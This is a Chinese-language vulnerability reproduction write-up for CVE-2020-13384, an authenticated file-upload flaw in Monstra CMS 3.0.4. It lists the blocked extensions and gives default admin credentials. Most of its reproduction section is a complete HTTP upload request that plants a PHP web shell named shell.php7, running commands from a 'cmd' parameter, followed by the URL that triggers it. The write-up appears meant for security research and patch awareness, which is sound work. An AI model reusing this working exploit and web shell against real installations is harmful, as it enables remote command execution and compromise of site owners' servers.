monstra 文件上传 (CVE-2020-13384)
所有文章,仅供安全研究与学习之用,后果自负!
monstra 文件上传 (CVE-2020-13384)
MonstraCMS是一套基于PHP与XML的现代化的轻量级内容管理系统,整套系统无需使用数据库,据说是一家乌克兰的公司开发的。
0x01 漏洞描述
Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。 账户名密码:admin/123456
该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh’, ‘bsh’, ‘c’, ‘htaccess’, ‘htpasswd’,‘exe’, ‘scr’, ‘dll’, ‘msi’, ‘vbs’, ‘bat’, ‘com’, ‘pif’, ‘cmd’, ‘vxd’, ‘cpl’,'empty’后缀的文件上传
poc
https://www.exploit-db.com/exploits/48479
0x02 影响范围
3.0.4
0x03 漏洞复现
-
Goto: http://192.168.2.5/monstra/admin/index.php?id=filesmanager&path=uploads/
-
Upload a one liner shell with php7 extenstion ie: shell.php7
请求包内容如下
POST /monstra/admin/index.php?id=filesmanager HTTP/1.1
Host: 192.168.2.5
Content-Length: 548
Cache-Control: max-age=0
Origin: http://192.168.2.5
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytRfyCkYq8NvztDBf
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.2.5/monstra/admin/index.php?id=filesmanager
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8,fr;q=0.7
Cookie: PHPSESSID=eej6e0lqi191k2frqc2hl3v6d0; _ga=GA1.1.405623579.1579949328; _gid=GA1.1.2042923722.1579949328
Connection: close
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="csrf"
2e6ae2353998caa319aae262b113c6b3f17a9636
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="file"; filename="shell.php7"
Content-Type: application/octet-stream
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
------WebKitFormBoundarytRfyCkYq8NvztDBf
Content-Disposition: form-data; name="upload_file"
Upload
------WebKitFormBoundarytRfyCkYq8NvztDBf--
- trigger your shell by visiting http://192.168.2.5/monstra/public/uploads/shell.php7?cmd=id
0x04 漏洞修复
升级至最新版本\
参考
https://www.exploit-db.com/exploits/48479
https://xz.aliyun.com/t/7850